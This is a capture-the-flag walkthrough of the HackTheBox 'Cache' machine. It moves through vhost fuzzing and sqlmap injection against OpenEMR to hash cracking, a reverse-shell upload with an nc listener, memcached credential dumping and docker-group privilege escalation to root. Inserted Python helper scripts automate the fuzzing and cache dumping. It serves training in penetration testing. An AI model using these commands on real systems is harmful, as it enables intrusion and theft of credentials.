0x01 Info Card
0x02 Tools and Tips
- nmap
- cewl
- wfuzz
- sqlmap
- openEMR exploit
- memcached exploit
- docker priv
0x03 Pentesting
Initial Enumeration
nmap scan:
# Nmap 7.80 scan initiated Wed May 20 16:58:59 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 17:00:01 2020 -- 1 IP address (1 host up) scanned in 61.63 seconds
Port 80
The home page has nothing useful, and brute-forcing the login form gets nowhere.
The Network tab shows the page loads functionality.js:
$(function(){
var error_correctPassword = false;
var error_username = false;
function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();
if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});
});
The credentials are hard-coded in client-side JavaScript: ash:H@v3_fun. Logging in with them works, but nothing behind the login is exploitable either. Next, the Author page:
Out of ideas, I messaged a few people on the HTB forum; the hint was to use cewl to pull the words off the Author page and then fuzz the HOST header with them.
Only later did I understand the idea: the words on this page, fed through cewl, become a wordlist of candidate subdomains:
# kali @ kali in ~/HackTheBox/Cache [16:24:16]
$ cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
Use wfuzz to find virtual hosts:
# kali @ kali in ~/HackTheBox/Cache [16:52:57]
$ wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.188/
Total requests: 42
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000037: 302 0 L 0 W 0 Ch "HMS"
Total time: 2.130227
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 19.71620
--hc 400 hides responses with status 400, and --hh 8193 hides responses whose size equals the default site's page (8193 chars); together they filter out everything the default vhost serves, leaving only Host values that are routed somewhere else.
Add hms.htb to /etc/hosts.
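The cewl-then-wfuzz step above as one script, added here as an example that is not part of the original walkthrough: it builds a cewl-style wordlist from page text, sends one request per candidate with a spoofed Host header, and reports any response whose status or size differs from the default vhost (the same idea as --hh 8193). The target is a constructed in-process HTTP server standing in for 10.10.10.188; the author page text, the 8193-byte default page and the single vhost hms.htb are all assumptions. Against a real box you would point fuzz_vhosts at the target IP and feed it the cewl output.

```python
import http.client
import http.server
import re
import socketserver
import threading

# Constructed stand-in for the target: any Host value that is not a configured
# vhost gets the default site, a fixed 8193-byte page (the size wfuzz hid with
# --hh 8193); the name-based vhost hms.htb answers with a 302 to the OpenEMR
# login instead. Assumption: hms.htb is the only extra vhost.
DEFAULT_BODY = b"<html><title>Cache</title></html>".ljust(8193, b" ")
KNOWN_VHOSTS = {"hms.htb"}

# Constructed text standing in for author.html (the page cewl was run on).
AUTHOR_PAGE = ("<p>Ash is a hobbyist developer. Check out his HMS project "
               "and his cache tricks.</p>")


class FakeVhostHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Apache matches ServerName case-insensitively, so "HMS.htb" hits hms.htb.
        host = self.headers.get("Host", "").split(":")[0].lower()
        if host in KNOWN_VHOSTS:
            self.send_response(302)
            self.send_header("Location", "/interface/login/login.php")
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(DEFAULT_BODY)))
        self.end_headers()
        self.wfile.write(DEFAULT_BODY)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_server():
    srv = socketserver.TCPServer(("127.0.0.1", 0), FakeVhostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def extract_words(html, min_len=1):
    """cewl -m <min_len> style wordlist: unique words from the page text."""
    text = re.sub(r"<[^>]+>", " ", html)
    words = []
    for w in re.findall(r"[A-Za-z0-9]+", text):
        if len(w) >= min_len and w not in words:
            words.append(w)
    return words


def probe(ip, port, host):
    """GET / with a spoofed Host header; returns (status, body length)."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    conn.request("GET", "/", headers={"Host": host})
    resp = conn.getresponse()
    length = len(resp.read())
    conn.close()
    return resp.status, length


def fuzz_vhosts(ip, port, words, domain="htb"):
    """Report every candidate that is served differently from the default vhost."""
    # Baseline with a name nobody configured, so the comparison is against the
    # default vhost rather than against whatever the first candidate returned.
    base = probe(ip, port, f"definitely-not-configured.{domain}")
    hits = []
    for w in words:
        host = f"{w}.{domain}"
        status, length = probe(ip, port, host)
        if (status, length) != base:
            hits.append((host, status, length))
    return hits


def run_demo():
    srv = start_fake_server()
    try:
        ip, port = srv.server_address
        return fuzz_vhosts(ip, port, extract_words(AUTHOR_PAGE))
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for host, status, length in run_demo():
        print(f"{status}  {length} Ch  {host}")
```

Two details worth keeping in mind on a real target: the filter compares both status and size, so a vhost that returns a 200 of a different length is still caught, and the baseline must be a hostname that is certainly not configured, otherwise a real vhost that happens to be first in the list becomes the reference and hides itself.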
HMS.htb
Weak passwords get nowhere on the OpenEMR login, so look for public exploits:
There are exploits for several versions. Trying OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution, the script asks for a valid account and password. Googling OpenEMR turned up a YouTube video about a SQL injection vulnerability.
Following the video: open http://hms.htb/portal, click Register, then visit http://hms.htb/portal/add_edit_event_user.php, where the eid parameter is injectable:
Intercept the request in Burp and save it to req.txt:
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=0bcd8bfgl4rl2sfc8qmg63u09b; PHPSESSID=juj09jki6pu38k34afv60j3vb9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Dump the database
Run sqlmap against the saved request to enumerate the databases:
$ sqlmap -r req.txt --dbs --batch
[11:52:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[11:52:46] [INFO] fetching database names
[11:52:47] [INFO] retrieved: 'information_schema'
[11:52:48] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr
Then let sqlmap do the rest: locate the users_secure table and dump its username and password columns:
[12:03:13] [INFO] fetching entries of column(s) '`password`, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username | password |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+
Crack the bcrypt hash with john:
# kali @ kali in ~/HackTheBox/Cache [12:11:02]
$ sudo john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-27 12:11) 1.694g/s 1464p/s 1464c/s 1464C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
That gives the OpenEMR login openemr_admin:xxxxxx.
upload reverse shell
Through the Administration -> Files module, upload a reverse shell by writing it into letter_templates/custom_pdf.php:
Start a listener on port 4444 locally, then browse to http://hms.htb/sites/default/letter_templates/custom_pdf.php:
$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.188] 54188
bash: cannot set terminal process group (2111): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/sites/default/letter_templates$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Getting User Access
Poking around the box as www-data shows a user named ash. Try password reuse: the credentials from functionality.js let us switch to ash:
www-data@cache:/var/www$ su ash
Password: H@v3_fun
ash@cache:/var/www$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
ash@cache:~$ cat user.txt
93bf------------------------8dfe
memcached exploit
Check which services are listening locally:
ash@cache:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
Port 11211 is memcached. It listens without any authentication, so a local user can read whatever is cached; exploitation approach (a new trick for me):
https://www.hackingarticles.in/penetration-testing-on-memcached-server/
https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
Fetch the slab statistics:
ash@cache:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 1
STAT 1:cmd_set 7730
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END
Using the slab id, inspect the items stored in that slab:
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 52
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 220
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7735
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 1
STAT items:1:hits_to_temp 0
END
dump all the keys:
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
Read the user and passwd keys:
get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
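The memcached enumeration above (stats items, stats cachedump, get) as a small Python client, added here as an example and not part of the original walkthrough. It talks to a constructed in-process fake memcached that implements just those text-protocol commands and holds the five keys from the cachedump output; the user and passwd values are the ones recovered above, while link, file and account hold made-up values. Against the real service you would call dump_cache("127.0.0.1", 11211) from the ash shell.

```python
import re
import socket
import socketserver
import threading

# Constructed cache contents standing in for the box's memcached. user and
# passwd hold the values recovered above; link, file and account are made up.
FAKE_STORE = {
    "link": b"https://hms.htb/portal",
    "user": b"luffy",
    "passwd": b"0n3_p1ec3",
    "file": b"nothing",
    "account": b"ACCOUNT_1",
}


class FakeMemcachedHandler(socketserver.StreamRequestHandler):
    """Just enough of the memcached text protocol for the enumeration below."""

    def handle(self):
        while True:
            line = self.rfile.readline()
            if not line:
                return
            parts = line.decode(errors="replace").split()
            if not parts or parts[0] == "quit":
                return
            out = []
            if parts[:2] == ["stats", "items"]:
                out = [f"STAT items:1:number {len(FAKE_STORE)}",
                       "STAT items:1:age 52"]
            elif parts[:2] == ["stats", "cachedump"] and len(parts) == 4:
                # stats cachedump <slab> <limit>; limit 0 means "all"
                if parts[2] == "1":
                    out = [f"ITEM {k} [{len(v)} b; 0 s]"
                           for k, v in FAKE_STORE.items()]
            elif parts[0] == "get":
                for key in parts[1:]:
                    if key in FAKE_STORE:
                        out.append(f"VALUE {key} 0 {len(FAKE_STORE[key])}")
                        out.append(FAKE_STORE[key].decode())
            else:
                self.wfile.write(b"ERROR\r\n")
                continue
            self.wfile.write("".join(l + "\r\n" for l in out + ["END"]).encode())


def mc_command(sock, cmd):
    """Send one text command; return the reply lines without the END terminator."""
    sock.sendall(cmd.encode() + b"\r\n")
    buf = b""
    # Reads until a line that is exactly END (or ERROR). A value whose data is
    # literally "END" would fool this; a binary-safe client uses the byte count
    # from the VALUE line instead.
    while not (buf.endswith(b"\r\nEND\r\n") or buf == b"END\r\n"
               or buf.endswith(b"ERROR\r\n")):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("memcached closed the connection")
        buf += chunk
    return buf.decode(errors="replace").split("\r\n")[:-2]


def slab_ids(items_stats):
    """Slab classes that currently hold at least one item."""
    ids = set()
    for line in items_stats:
        m = re.match(r"STAT items:(\d+):number (\d+)$", line)
        if m and int(m.group(2)) > 0:
            ids.add(int(m.group(1)))
    return sorted(ids)


def cachedump_keys(sock, slab):
    """Key names from 'ITEM <key> [<bytes> b; <expiry> s]' lines."""
    keys = []
    for line in mc_command(sock, f"stats cachedump {slab} 0"):
        m = re.match(r"ITEM (\S+) \[(\d+) b; (\d+) s\]", line)
        if m:
            keys.append(m.group(1))
    return keys


def get_value(sock, key):
    """Parse 'VALUE <key> <flags> <bytes>' followed by the data line."""
    lines = mc_command(sock, f"get {key}")
    for i, line in enumerate(lines):
        if line.startswith(f"VALUE {key} ") and i + 1 < len(lines):
            return lines[i + 1]
    return None


def dump_cache(host, port):
    """stats items -> stats cachedump per slab -> get each key."""
    found = {}
    with socket.create_connection((host, port), timeout=5) as s:
        for slab in slab_ids(mc_command(s, "stats items")):
            for key in cachedump_keys(s, slab):
                found[key] = get_value(s, key)
        s.sendall(b"quit\r\n")
    return found


def run_demo():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeMemcachedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return dump_cache(*srv.server_address)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:10} {value}")
```

stats cachedump only returns a limited number of keys per slab and is deprecated; on newer memcached builds use lru_crawler metadump all, which lists every key with its size and expiry, then get each one. The underlying issue is the same either way: memcached has no authentication, so anything an application puts in it (here a cleartext username and password) is readable by any user who can reach the port.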
SSH login with the recovered credentials:
$ ssh luffy@10.10.10.188
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
luffy@10.10.10.188's password:
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
Note that luffy is a member of the docker group, which is equivalent to root: any member can start a container that mounts the host filesystem.
Getting Root Access
GTFOBins: docker
List the available docker images:
luffy@cache:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB
Escalate the way GTFOBins describes: mount the host's / into a container and chroot into it:
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@2b2647044657:/# id
uid=0(root) gid=0(root) groups=0(root)
root@2b2647044657:/# cd
root@2b2647044657:~# cat root.txt
32fc------------------------ceab
0x04 Reference
Topic | URL |
---|---|
OpenEMR vulnerability (video) | https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s |
Memcached | https://www.hackingarticles.in/penetration-testing-on-memcached-server/ |
Memcached | https://niiconsulting.com/checkmate/2013/05/memcache-exploit/ |
Docker | https://gtfobins.github.io/gtfobins/docker/ |
This article first appeared on the WeChat public account 星盟安全: HackTheBox-Cache-Walkthrough